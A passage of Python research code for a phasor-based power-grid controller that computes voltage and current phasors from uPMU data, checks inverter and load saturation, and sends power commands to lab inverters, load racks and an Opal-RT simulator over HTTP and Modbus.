(self.Vang_with120degshifts,self.VangRef,self.Vang_without120degshifts,self.Vmag,self.VmagRef,self.Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. variables bc in case a match isnt found, they're already initialized\n # return (Vang_with120degshifts,VangRef,Vang_without120degshifts,Vmag,VmagRef,Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. variables bc in case a match isnt found, they're already initialized\n\n\n def phasorI_calc(self, dataWindowLength, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n #uses the same time indeces and votlage reference from the voltage search\n # Initialize\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ref = [0] * nphases #dont think this is ever needed, current is not a relative measurement the way voltage is\n flag = [1] * nphases\n\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n # if len(local_phasors[plug]) > self.nPhasorReadings:\n # dataWindowLength = self.nPhasorReadings\n # else:\n # dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n # the + nphases gives the current rather than the voltage measurements\n ordered_local[phase_idx] = local_phasors[plug + nphases][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n # no + nphases for ref bc you WANT the voltage ref\n ref[plug] = reference_phasors[plug][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n\n #havent debugged this yet..\n print(';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;')\n print('Current ordered_local[phase][0][time] ', ordered_local[phase][0]['time'])\n print('Current ordered_local[phase][-1][time] ', ordered_local[phase][-1]['time'])\n print('Current ref[phase][0][time] ', ref[phase][0]['time'])\n print('Current ref[phase][-1][time] ', ref[phase][-1]['time'])\n\n Imag = np.asarray([np.NaN]*nphases)\n ImagSum = np.zeros(nphases)\n ImagCount = np.zeros(nphases)\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Imagi = local_packet['magnitude']\n if Imagi is None:\n print('Imagi is None')\n elif np.isnan(Imagi):\n print('Imagi is NaN')\n elif Imagi == 0:\n print('Imagi is 0')\n else:\n ImagSum[phase] += Imagi\n ImagCount[phase] += 1\n Imag[phase] = ImagSum[phase]/ImagCount[phase]\n print('ImagCount ', ImagCount)\n print('Imag ', Imag)\n print(';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;')\n\n Iang_notRelative = np.asarray([np.NaN]*nphases)\n local_time_index = [np.NaN]*nphases\n ref_time_index = [np.NaN]*nphases\n\n IangCount = np.zeros(nphases)\n Iang_notRelativeSum = np.zeros(nphases)\n\n refAngleUsedVec = np.zeros(dataWindowLength) # to check if any refs are used twice (they shouldnt be)\n #for ref_i, ref_packet in enumerate(reversed(ref[phase])):\n\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading starting from most recent\n for local_packet in reversed(ordered_local[phase]): #doesnt need ot be reversed when using averaging (as done now), but doesnt hurt\n # extract most recent ordered_local uPMU reading\n local_time = int(local_packet['time'])\n # loops though every reference uPMU reading starting from most recent\n for ref_packet in reversed(ref[phase]):\n ref_time = int(ref_packet['time'])\n\n # check timestamps of ordered_local and reference uPMU if within 2 ms\n if abs(ref_time - local_time) <= self.pmuTimeWindow:\n local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n ref_time_index[phase] = ref[phase].index(ref_packet)\n # Extract measurements from closest timestamps\n I_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n V_ang_ref_firstPhaseTemp = ref[0][ref_time_index[phase]]['angle']\n # I_ang_local = self.PhasorV_ang_wraparound_1d(ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift)\n # V_ang_ref_firstPhaseTemp = self.PhasorV_ang_wraparound_1d(ref[0][ref_time_index[phase]]['angle'])\n\n if V_ang_ref_firstPhaseTemp == np.NaN or V_ang_ref_firstPhaseTemp == None: #(could put in a better check here, eg is the angle in a reasonable range)\n print('WARNING: [in phasorI_calc] issue getting a nonRelative voltage angle. This will mess up the LQR controller.')\n\n Iang_notRelativeSum[phase] += np.radians(I_ang_local - V_ang_ref_firstPhaseTemp)\n IangCount[phase] += 1\n # if refAngleUsedVec[i] == 1:\n # print('WARNING, this ref angle was already used')\n # refAngleUsedVec[i] = 1\n\n flag[phase] = 0\n #for debugging\n # print(f'Current ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n\n if flag[phase] == 1:\n print('PhasorI_calc: No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n else:\n Iang_notRelative[phase] = Iang_notRelativeSum[phase]/IangCount[phase]\n\n print('Iang_notRelative ', Iang_notRelative)\n print('IangCount ', IangCount)\n print(';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;')\n\n # return self.Iang_notRelative, self.Iang_relative, self.Imag\n return Iang_notRelative, Imag\n\n # old version that didnt take average\n # def old_phasorI_calc(self, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n def old_phasorI_calc(self, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, local_phasors, nphases, plug_to_V_idx):\n #uses the same time indeces and votlage reference from the voltage search\n # Initialize\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ref = [0] * nphases #dont think this is ever needed, current is not a relative measurement the way voltage is\n Imag = [np.NaN] * nphases\n # Iang_relative = [np.NaN] * nphases\n Iang_notRelative = [np.NaN] * nphases\n for plug in range(nphases):\n phase_idx = plug_to_V_idx[plug] #assumes the current plugs are hooked up the same way\n ordered_local[phase_idx] = local_phasors[plug + nphases][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n # ref[plug] = reference_phasors[plug + nphases][-dataWindowLength:] #plug + nphases selects the current data rather than the voltage data\n\n for phase in range(nphases):\n # Extract measurements from closest timestamps\n I_ang_local = ordered_local[phase][local_time_index[phase]]['angle']\n # I_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n # I_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] # this is wrong, need to Vref[0]\n I_ang_ref_firstPhase = V_ang_ref_firstPhase[phase] # V_ang_ref_firstPhase[phase] = ref[0][ref_time_index[phase]]['angle'] #this is indexed by phase in case the different phase measurements use different time steps\n\n # self.Iang_relative[phase] = np.radians(I_ang_local - I_ang_ref) #uses self. so it defaults to previous value\n # self.Imag[phase] = ordered_local[phase][local_time_index[phase]]['magnitude']\n Iang_notRelative[phase] = np.radians(I_ang_local - I_ang_ref_firstPhase)\n Imag[phase] = ordered_local[phase][local_time_index[phase]]['magnitude']\n\n # return self.Iang_notRelative, self.Iang_relative, self.Imag\n return Iang_notRelative, Imag\n\n\n # #just uses the most recent current and voltage measurements, doesnt need a match w reference\n # def PQ_solver(self, local_phasors, nphases, plug_to_V_idx):\n # # Initialize\n # V_mag = [0.0] * nphases\n # V_ang = [0.0] * nphases\n # I_mag = [0.0] * nphases\n # I_ang = [0.0] * nphases\n # theta = [0.0] * nphases\n # Pact_kVA = np.asarray([0.0] * nphases)\n # Qact_kVA = np.asarray([0.0] * nphases)\n # ''' COMMENTED OUT FOR CIL TESTING ONLY!\n # for plug in range(nphases):\n # phase_idx = plug_to_V_idx[plug] #assumes plug to V map is the same for uPMUp123 voltage, uPMU123 current and uPMU123 voltage\n # V_mag[phase_idx] = local_phasors[plug][-1]['magnitude'] #pulls out vmeas from uPMU123 not uPMUP123\n # V_ang[phase_idx] = local_phasors[plug][-1]['angle']\n # I_mag[phase_idx] = local_phasors[(nphases + plug)][-1]['magnitude'] # Check plugs!\n # I_ang[phase_idx] = local_phasors[(nphases + plug)][-1]['angle'] # Check plugs!\n # theta[phase_idx] = np.radians(V_ang[phase_idx] - I_ang[phase_idx]) #angle comes in in degrees, theta is calced for each phase, so there shouldnt be any 2pi/3 offsets\n # # P = (VI)cos(theta), Q = (VI)sin(theta)\n # Pact_kVA[phase_idx] = V_mag[phase_idx] * I_mag[phase_idx] * (np.cos(theta[phase_idx]))/1000\n # Qact_kVA[phase_idx] = V_mag[phase_idx] * I_mag[phase_idx] * (np.sin(theta[phase_idx]))/1000\n # '''\n # return (Pact_kVA,Qact_kVA)\n\n\n def checkSaturationWoImeas(self, nphases, Vcomp, Pcmd_kVA, Qcmd_kVA,):\n # compare self.VcompPrev w Vcomp and if it keeps missing in the same direction declare that its saturated\n #could be confused by Q offset\n sat_arrayP = np.ones(nphases) # 1 indicates not saturated\n sat_arrayQ = np.ones(nphases)\n return sat_arrayP, sat_arrayQ\n\n\n def checkSaturation(self, nphases, Pact, Qact, Pcmd_kVA, Qcmd_kVA, P_PV):\n Pcmd = Pcmd_kVA * 1000\n Qcmd = Qcmd_kVA * 1000\n Pact_VA = Pact*1000\n Qact_VA = Qact*1000\n if self.actType == 'inverter':\n\n '''\n HAD TO COMMENT OUT AND MICKEY MOUSE SATURATION CHECK FOR CIL\n # find indicies where Pact + tolerance is less than Pcmd\n #indexP = np.where(abs(Pact_VA + (0.03 * Pcmd)) < abs(Pcmd))[0] #will be zero if Pcmd is zero\n print(f'PactVA: {Pact_VA}, P_PV: {P_PV}, Pact-P_PV+500: {abs(Pact_VA - P_PV)+500}, abs(Pcmd): {abs(Pcmd)}')\n indexP = np.where(abs(Pact_VA - P_PV) + 500 < abs(Pcmd))[0] #specific to step size of inverters\n # find indicies where Qact + tolerance is less than Qcmd\n #indexQ = np.where(abs(Qact_VA + (0.03 * Qcmd)) < abs(Qcmd))[0]\n print(f'QactVA+250: {abs(Qact_VA)+250}, abs(Qcmd): {abs(Qcmd)}')\n indexQ = np.where(abs(Qact_VA) + 250 < abs(Qcmd))[0]\n\n '''\n\n indexP = np.where(abs(Pcmd)>= self.ORT_max_VA/self.localSratio)[0]\n indexQ = np.where(abs(Qcmd)>= self.ORT_max_VA/self.localSratio)[0]\n\n elif self.actType == 'load':\n indexP = np.where(abs(Pcmd) > self.loadrackPlimit/2)[0]\n indexQ = np.where(abs(Qcmd) > self.loadrackPlimit/2)[0]\n elif self.actType == 'modbus':\n indexP = np.where(abs(Pcmd)== self.ORT_max_VA/self.localSratio)[0]\n indexQ = np.where(abs(Qcmd)== self.ORT_max_VA/self.localSratio)[0]\n else:\n error('actType error')\n \"Checking for P saturation (anti-windup control)\"\n # initialize saturation counter for each phase\n sat_arrayP = np.ones(nphases) #\n # stop integrator for saturated phases\n for i in indexP:\n sat_arrayP[i] = 0 #0 where saturated\n \"Checking for Q saturation (anti-windup control)\"\n # initialize saturation counter for each phase\n sat_arrayQ = np.ones(nphases)\n # stop integrator for saturated phases\n for i in indexQ:\n sat_arrayQ[i] = 0\n return(sat_arrayP,sat_arrayQ)\n\n\n def determineICDI(self, nphases, sat_arrayP, sat_arrayQ, Pact_pu, Qact_pu):\n # saturation counter check to determine if I Cant Do It signal should be sent to SPBC\n self.Psat = np.append(self.Psat, np.expand_dims(sat_arrayP, axis=1), axis=1)\n self.Psat = self.Psat[:, 1:] #iterates the Psat counter array to include the new value, discards the old\n for phase in range(nphases):\n if phase in np.where(~self.Psat.any(axis=1))[0]: #if each row doesnt have a 1 in it, then send ICDI for that phase\n self.ICDI_sigP[phase] = True\n if self.actType == 'inverter':\n '''\n COMMENTED OUT FOR CIL TESTING\n #self.Pmax_pu[phase] = Pact_pu[phase]\n '''\n self.Pmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n elif self.actType == 'load':\n self.Pmax_pu[phase] = (self.loadrackPlimit/2)/(self.localkVAbase[phase] *1000) #Sratio double counted in localkVAbase\n elif self.actType == 'modbus':\n self.Pmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n else:\n self.ICDI_sigP[phase] = False\n self.Pmax_pu[phase] = np.NaN\n self.Qsat = np.append(self.Qsat, np.expand_dims(sat_arrayQ, axis=1), axis=1)\n self.Qsat = self.Qsat[:, 1:]\n for phase in range(nphases):\n if phase in np.where(~self.Qsat.any(axis=1))[0]:\n self.ICDI_sigQ[phase] = True\n if self.actType == 'inverter':\n '''\n COMMENTED OUT FOR CIL TESTING\n self.Qmax_pu[phase] = Qact_pu[phase]\n '''\n self.Qmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n elif self.actType == 'load':\n self.Qmax_pu[phase] = 0\n elif self.actType == 'modbus':\n self.Qmax_pu[phase] = self.ORT_max_VA /(self.localkVAbase[phase] *1000)\n else:\n self.ICDI_sigQ[phase] = False\n self.Qmax_pu[phase] = np.NaN\n return (self.ICDI_sigP, self.ICDI_sigQ, self.Pmax_pu, self.Qmax_pu)\n\n\n def httptoInverters(self, nphases, act_idxs, Pcmd_kVA, Qcmd_kVA, Pact):\n # hostname: http://131.243.41.47:\n # port: 9090\n # Sends P and Q command to actuator\n #needs an up-to-date Pact, which requires a current measurement\n #HERE Pact is defined as positive out of the network into the inverter (Pact, Pbatt and P_PV are all positive out of the network in flexlab). This convention should be swithced in later implemetations, but shouldnt require changing (too many) signs\n Pcmd_VA = Pcmd_kVA*1000 # *** SIGNS CHANGED 5/21/20!!! ***\n Qcmd_VA = Qcmd_kVA*1000 #HERE Power factor as positive for Q into the network, which is backwards of the rest of the conventions\n #initialize parallel API command:\n session = FuturesSession()\n urls = []\n commandReceipt = np.zeros(nphases).tolist()\n if self.mode == 1: #1: PV as disturbance\n self.P_PV = (Pact*1000) - self.batt_cmd #P_PV is defined as positive into the solar panel (to be consistent w battery convention) #batt_cmd from last round, still in effect\n for i, inv in zip(range(nphases), act_idxs):\n self.batt_cmd[i] = int(round(Pcmd_VA[i])) #in mode 1 the battery is controlled directly\n if abs(self.batt_cmd[i]) > self.batt_max:\n self.batt_cmd[i] = int(np.sign(Pcmd_VA[i]) * self.batt_max)\n if ((self.batt_cmd[i] + self.P_PV[i])**2 + Qcmd_VA[i]**2) > (self.inv_s_max)**2: #if Qcmd is over the max, set it to the max for the given P command (favors P over Q)\n Qcmd_VA[i] = np.sign(Qcmd_VA[i]) * np.sqrt((self.inv_s_max)**2 - (self.batt_cmd[i] + self.P_PV[i])**2) #what happens by default? it probably maintains the PF command and just produces less P (and the battery curtails itself naturally)\n self.pf_ctrl[i] = (np.sign(Qcmd_VA[i])*-1. * abs(self.batt_cmd[i] + self.P_PV[i])) / \\\n (np.sqrt(((self.batt_cmd[i] + self.P_PV[i])**2) + (Qcmd_VA[i]**2))) #self.batt_cmd[i] + P_PV is ~ the full P flowing through the inverter\n if np.abs(self.pf_ctrl[i]) < 0.1:\n pf_ctrl = 0.1\n print(f'pf cmd: {self.pf_ctrl[i]}, batt cmd: {self.batt_cmd[i]}')\n urls.append(f\"http://131.243.41.47:9090/control?Batt_ctrl={self.batt_cmd[i]},pf_ctrl={self.pf_ctrl[i]},inv_id={inv}\")\n if self.mode == 2: #mode 2: PV calculated (from previous timestep)\n self.P_PV = Pact - self.batt_cmd #batt_cmd from last round, still in effect\n for i, inv in zip(range(nphases), act_idxs):\n self.batt_cmd[i] = int(round(Pcmd_VA[i] - self.P_PV[i])) #in mode 2 the battery and PV are controlled jointly\n if abs(self.batt_cmd[i]) > self.batt_max:\n self.batt_cmd[i] = int(np.sign(Pcmd_VA[i]) * self.batt_max)\n if (self.batt_cmd[i]**2 + Qcmd_VA[i]**2) > (self.inv_s_max)**2: #if Qcmd is over the max, set it to the max for the given P command (favors P over Q)\n Qcmd_VA[i] = np.sign(Qcmd_VA[i]) * np.sqrt((self.inv_s_max)**2 - self.batt_cmd[i]**2)\n self.pf_ctrl[i] = (np.sign(Qcmd_VA[i])*-1. * abs(self.batt_cmd[i])) / \\\n (np.sqrt((self.batt_cmd[i]**2) + (Qcmd_VA[i]**2))) #self.batt_cmd is ~ the full P flowing through the inverter\n if np.abs(self.pf_ctrl[i]) < 0.1:\n pf_ctrl = 0.1\n print(f'pf cmd: {self.pf_ctrl[i]}, batt cmd: {self.batt_cmd[i]}')\n urls.append(f\"http://131.243.41.47:9090/control?Batt_ctrl={self.batt_cmd[i]},pf_ctrl={self.pf_ctrl[i]},inv_id={inv}\")\n if self.mode == 3: #mode 3: PV only (no battery commands)\n Pcmd_VA = -Pcmd_VA #HERE for inverter control, P is postive into the network (offsets negative at the beginning of this function)\n for i, inv in zip(range(nphases), act_idxs): #HERE make sure act_idxs is working\n Inv_Pperc_max = 97\n #in mode 3 p_ctrl is used instead of battery control, to control PV\n if Pcmd_VA[i] < 0:\n Pcmd_VA[i] = 0\n self.invPperc_ctrl[i] = (Pcmd_VA[i] / self.inv_s_max_commands) * 100 #invPperc_ctrl cannot be negative\n if self.invPperc_ctrl[i] > Inv_Pperc_max:\n self.invPperc_ctrl[i] = Inv_Pperc_max\n self.pf_ctrl[i] = 1\n # pf_ctrl = ((np.sign(Qcmd_VA[i]) * -1.0) * Inv_Pperc_max\n else:\n self.pf_ctrl[i] = (np.sign(Qcmd_VA[i])*-1. * abs(Pcmd_VA[i])) / \\\n (np.sqrt((Pcmd_VA[i] ** 2) + (Qcmd_VA[i] ** 2)))\n if np.abs(self.pf_ctrl[i]) < 0.1:\n self.pf_ctrl[i] = 0.1\n print(f'pf cmd: {self.pf_ctrl[i]}, batt cmd: {self.batt_cmd[i]}')\n urls.append(f\"http://131.243.41.47:9090/control?P_ctrl={self.invPperc_ctrl[i]},pf_ctrl={self.pf_ctrl[i]},inv_id={inv}\")\n responses = map(session.get, urls)\n results = [resp.result() for resp in responses]\n for i in range(nphases):\n if results[i].status_code == 200:\n commandReceipt[i] = 'success'\n else:\n commandReceipt[i] = 'failure'\n return commandReceipt\n\n\n def httptoLoads(self, nphases, act_idxs, Pcmd_kVA, Qcmd_kVA):\n #load commands are between 0 and 2000, but from the LPBC's perspective it can control between -1000 and 1000 W, with 1000 W collocated\n #Pcmd is power into the network, but load commands are just load power (power of out of the network)\n Pcmd_VA = Pcmd_kVA*1000\n Qcmd_VA = Qcmd_kVA*1000\n #initialize parallel API command:\n session = FuturesSession()\n urls = []\n commandReceipt = np.zeros(nphases).tolist()\n for i, group in zip(range(nphases), act_idxs): #same as enumerate\n self.load_cmd[i] = int(np.round((-1. * Pcmd_VA[i]) + self.loadrackPlimit/2)) # -1* bc command goes to a load not an inverter, +self.loadrackPlimit/2 centers the command around 0\n if self.load_cmd[i] > self.loadrack_manuallimit: #self.loadrackPlimit:\n urls.append(f\"http://131.243.41.118:9090/control?group_id={group},P_ctrl={self.loadrack_manuallimit}\")\n elif self.load_cmd[i] < 0:\n urls.append(f\"http://131.243.41.118:9090/control?group_id={group},P_ctrl=0\")\n else:\n urls.append(f\"http://131.243.41.118:9090/control?group_id={group},P_ctrl={self.load_cmd[i]}\")\n responses = map(session.get, urls)\n results = [resp.result() for resp in responses]\n for i in range(nphases):\n if results[i].status_code == 200:\n commandReceipt[i] = 'success'\n else:\n commandReceipt[i] = 'failure'\n return commandReceipt\n\n\n def modbustoOpal(self, nphases, Pcmd_kVA, Qcmd_kVA, ORT_max_VA, localSratio, client ):\n Pcmd_VA = -1 * (Pcmd_kVA * 1000) #sign negation is convention of modbus\n Qcmd_VA = -1 * (Qcmd_kVA * 1000) #sign negation is convention of modbus\n for phase in range(nphases):\n print(f'Opal Pcmd_VA[{phase}] : ' + str(Pcmd_VA[phase]))\n print(f'Opal Qcmd_VA[{phase}] : ' + str(Qcmd_VA[phase]))\n print('ORT_max_VA/localSratio : ' + str(ORT_max_VA/localSratio))\n if abs(Pcmd_VA[phase]) > ORT_max_VA/localSratio:\n print('WARNING Pcmd over Opal limit, using +/- max: ', np.sign(Pcmd_VA[phase]) * ORT_max_VA/localSratio)\n Pcmd_VA[phase] = np.sign(Pcmd_VA[phase]) * ORT_max_VA/localSratio\n if abs(Qcmd_VA[phase]) > ORT_max_VA/localSratio:\n print('WARNING Qcmd over Opal limit, using +/- max: ', np.sign(Qcmd_VA[phase]) * ORT_max_VA/localSratio)\n Qcmd_VA[phase] = np.sign(Qcmd_VA[phase]) * ORT_max_VA/localSratio\n id = 3\n # P,Q commands in W and VAR (not kilo)\n P_implemented_PU = Pcmd_VA/(self.localkVAbase*1000) #HERE bc Pcmd_VA = Pcmd_PU * self.localkVAbase * 1000\n Q_implemented_PU = Qcmd_VA/(self.localkVAbase*1000)\n\n if nphases == 3:\n P1, P2, P3 = abs(Pcmd_VA[0]), abs(Pcmd_VA[1]), abs(Pcmd_VA[2])\n Q1, Q2, Q3 = abs(Qcmd_VA[0]), abs(Qcmd_VA[1]), abs(Qcmd_VA[2])\n # TODO modbus only: manually change phase actuation on modbus here if needed on different phase\n elif nphases == 1:\n P1, P2, P3 = abs(Pcmd_VA[0]), 0, 0\n Q1, Q2, Q3 = abs(Qcmd_VA[0]), 0, 0\n\n elif nphases == 2: # Phase A, B only (change if needed)\n P1, P2, P3 = abs(Pcmd_VA[0]), abs(Pcmd_VA[1]), 0\n Q1, Q2, Q3 = abs(Qcmd_VA[0]), abs(Qcmd_VA[1]), 0\n\n # set signs of commands through sign_vec\n # P,Q 1 is positive, 0 is negative\n sign_vec = []\n for p, q in zip(Pcmd_VA, Qcmd_VA):\n if p >= 0:\n sign_vec.append(1)\n if p < 0:\n sign_vec.append(0)\n if q >= 0:\n sign_vec.append(1)\n if q < 0:\n sign_vec.append(0)\n if nphases == 3:\n print('sign_vec ', sign_vec)\n sign_base = 2 ** 5 * sign_vec[0] + 2 ** 4 * sign_vec[1] + 2 ** 3 * sign_vec[2] + 2 ** 2 * sign_vec[3] + 2 ** 1 * sign_vec[4] + 2 ** 0 * sign_vec[5]\n # TODO modbus only: manually change phase actuation on modbus here for sign base if needed on different phase\n elif nphases == 1:\n sign_base = 2 ** 5 * sign_vec[0] + 2 ** 4 * sign_vec[1]\n\n elif nphases == 2: # Phase A, B only (change if needed)\n sign_base = 2 ** 5 * sign_vec[0] + 2 ** 4 * sign_vec[1] + 2 ** 3 * sign_vec[2] + 2 ** 2 * sign_vec[3]\n\n\n mtx = [P1, Q1, P2, Q2, P3, Q3, sign_base]\n print('mtx : ' + str(mtx))\n mtx_register = np.arange(1, 8).tolist()\n try:\n client.connect()\n # write switch positions for config\n for i in range(len(mtx)):\n client.write_registers(int(mtx_register[i]), int(mtx[i]), unit=id)\n result = 'sent'\n except Exception as e:\n result = ('exceptions', e)\n finally:\n client.close()\n\n return result\n # return result, P_implemented_PU, Q_implemented_PU\n\n\n def initializeActuators(self, mode):\n if mode == 0:\n return\n elif mode == 1 or mode == 2:\n responseInverters = requests.get(\"http://131.243.41.47:9090/control?P_ctrl=97,Batt_ctrl=0\")\n elif mode == 3:\n responseInverters = requests.get(\"http://131.243.41.47:9090/control?P_ctrl=0,Batt_ctrl=0\")\n #responseLoads = requests.get(f\"http://131.243.41.118:9090/control?P_ctrl=0\")\n if responseInverters.status_code != 200 or responseLoads.status_code != 200:\n error('Error with actuator initialization, responseInverters.status_code = ' + str(responseInverters.status_code) + 'responseLoads.status_code = ' + str(responseLoads.status_code))\n return (responseInverters.status_code, responseLoads.status_code)\n\n\n # def statusforSPBC(self, phases, phasor_error_mag_pu, phasor_error_ang, ICDI_sigP, ICDI_sigQ, Pmax_pu, Qmax_pu):\n # status = {}\n # # status's keys should be lists\n # status['phases'] = phases\n # status['phasor_errors'] = {\n # 'V': list(phasor_error_mag_pu.ravel()), #ravel flatens the dimensions\n # 'delta': list(phasor_error_ang.ravel())\n # }\n # status['p_saturated'] = list(ICDI_sigP.ravel())\n # status['q_saturated'] = list(ICDI_sigQ.ravel())\n # status['p_max'] = list(Pmax_pu.ravel())\n # status['q_max'] = list(Qmax_pu.ravel())\n # return(status)\n\n # def PhasorV_ang_wraparound_1d(self, Vang):\n # # brings angles to less than +/- max_degrees\n # # max_degrees = 300.\n # max_degrees = 180. #this will bring angles to within +/- 180 degrees\n # Vang_wrap = Vang\n # # if abs(Vang) > np.radians(max_degrees):\n # # if Vang > 0:\n # # Vang_wrap = Vang - np.radians(360.)\n # # elif Vang < 0:\n # # Vang_wrap = Vang + np.radians(360.)\n # while abs(Vang_wrap) > np.radians(max_degrees):\n # if Vang_wrap > 0:\n # # print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n # Vang_wrap = Vang_wrap - np.radians(360.)\n # print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from phase {phase} to get {Vang_wrap}')\n # elif Vang_wrap < 0:\n # # print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n # Vang_wrap = Vang_wrap + np.radians(360.)\n # print(f'ADDING 2pi radians in PhasorV_ang_wraparound from phase {phase} to get {Vang_wrap}')\n # return Vang_wrap\n\n def PhasorV_ang_wraparound(self, Vang, nphases=None, nameVang='(notgiven)'):\n # brings angles to less than +/- max_degrees\n # max_degrees = 300.\n max_degrees = 180. #this will bring angles to within +/- 180 degrees\n Vang_wrap = Vang\n if isinstance(Vang, float):\n while abs(Vang_wrap) > np.radians(max_degrees):\n if Vang_wrap > 0:\n # print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap = Vang_wrap - np.radians(360.)\n print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from {Vang} to get {Vang_wrap}')\n elif Vang_wrap < 0:\n # print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap = Vang_wrap + np.radians(360.)\n print(f'ADDING 2pi radians in PhasorV_ang_wraparound from {Vang} to get {Vang_wrap}')\n else: #elif isinstance(Vang, np.ndarray):\n nphases = len(Vang)\n for phase in range(nphases):\n # if abs(Vang[phase]) > np.radians(max_degrees):\n # if Vang[phase] > 0:\n # print(f'Vang[{phase}] = {Vang[phase]}')\n # Vang_wrap[phase] = Vang[phase] - np.radians(360.)\n # print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n # # print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from phase {phase} to get {Vang_wrap[phase]}')\n # elif Vang[phase] < 0:\n # print(f'Vang[{phase}] = {Vang[phase]}')\n # Vang_wrap[phase] = Vang[phase] + np.radians(360.)\n # print(f'ADDING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n # # print(f'ADDING 2pi radians in PhasorV_ang_wraparound from phase {phase} to get {Vang_wrap[phase]}')\n while abs(Vang_wrap[phase]) > np.radians(max_degrees):\n if Vang_wrap[phase] > 0:\n print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap[phase] = Vang_wrap[phase] - np.radians(360.)\n print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n # print(f'SUBTRACTING 2pi radians in PhasorV_ang_wraparound from phase {phase} to get {Vang_wrap[phase]}')\n elif Vang_wrap[phase] < 0:\n print(f'Vang_wrap[{phase}] = {Vang_wrap[phase]}')\n Vang_wrap[phase] = Vang_wrap[phase] + np.radians(360.)\n print(f'ADDING 2pi radians in PhasorV_ang_wraparound from {nameVang} phase {phase} to get {Vang_wrap[phase]}')\n # print(f'ADDING 2pi radians in PhasorV_ang_wraparound from phase {phase} to get {Vang_wrap[phase]}')\n # else:\n # print('ERROR Vang not list or float')\n return Vang_wrap\n\n def save_actuation_data(self, phases, P_cmd, Q_cmd, P_act, Q_act, P_PV, Batt_cmd, pf_ctrl):\n log_actuation= {}\n\n log_actuation['phases'] = phases\n log_actuation['P_cmd'] = P_cmd.tolist()\n log_actuation['Q_cmd'] = Q_cmd.tolist()\n log_actuation['P_act'] = P_act.tolist()\n log_actuation['Q_act'] = Q_act.tolist()\n log_actuation['P_PV'] = (P_PV/1000).tolist()\n log_actuation['Batt_cmd'] = (Batt_cmd/1000).tolist()\n log_actuation['pf_ctrl'] = pf_ctrl.tolist()\n\n return log_actuation\n\n #step gets called every (rate) seconds starting with init in LPBCProcess within do_trigger/trigger/call_periodic (XBOSProcess) with:\n #status = self.step(local_phasors, reference_phasors, phasor_targets)\n def step(self, local_phasors, reference_phasors, phasor_target): #HERE what happens when no PMU readings are given (Gabe), maybe step wont be called\n '''\n print('REF upmu0: ')\n print(reference_phasors[0][0])\n print(reference_phasors[1][0])\n print(reference_phasors[2][0])\n print('upmu4 voltage: ')\n print('PHASE A: ',local_phasors[0][0])\n print('PHASE B: ',local_phasors[1][0])\n print('PHASE C: ', local_phasors[2][0])\n print('current: ')\n print('PHASE A: ',local_phasors[3][0])\n print('PHASE B: ',local_phasors[4][0])\n print('PHASE C: ', local_phasors[5][0])\n '''\n\n #Initilizes actuators, makes sure you're getting through to them\n if self.iteration_counter == 0:\n pass\n #HHERE commented out for debugging\n #could call CIL_debug.py (or a function that does what CIL_debug.py does) here to reset the Opal registers\n # (responseInverters, responseLoads) = self.initializeActuators(self.mode) #throws an error if initialization fails\n # return\n\n iterstart = pytime.time()\n self.iteration_counter += 1\n print('iteration counter bus ' + str(self.busId) + ' : ' + str(self.iteration_counter))\n if self.iteration_counter > 1:\n print(f'time since last iteration {iterstart-self.iterstart}')\n self.iterstart = pytime.time()\n\n if True: #relic from lpbcwrapper\n #HEREE\n # if self.usingNonpuZeff and self.ZeffkestinitHasNotBeenInitialized:\n # Zbase = 1000*self.kVbase*self.kVbase/self.network_kVAbase #setup.py uses subkVbase_phg*subkVbase_phg*1000/subkVAbase to calc Zbase, so this is 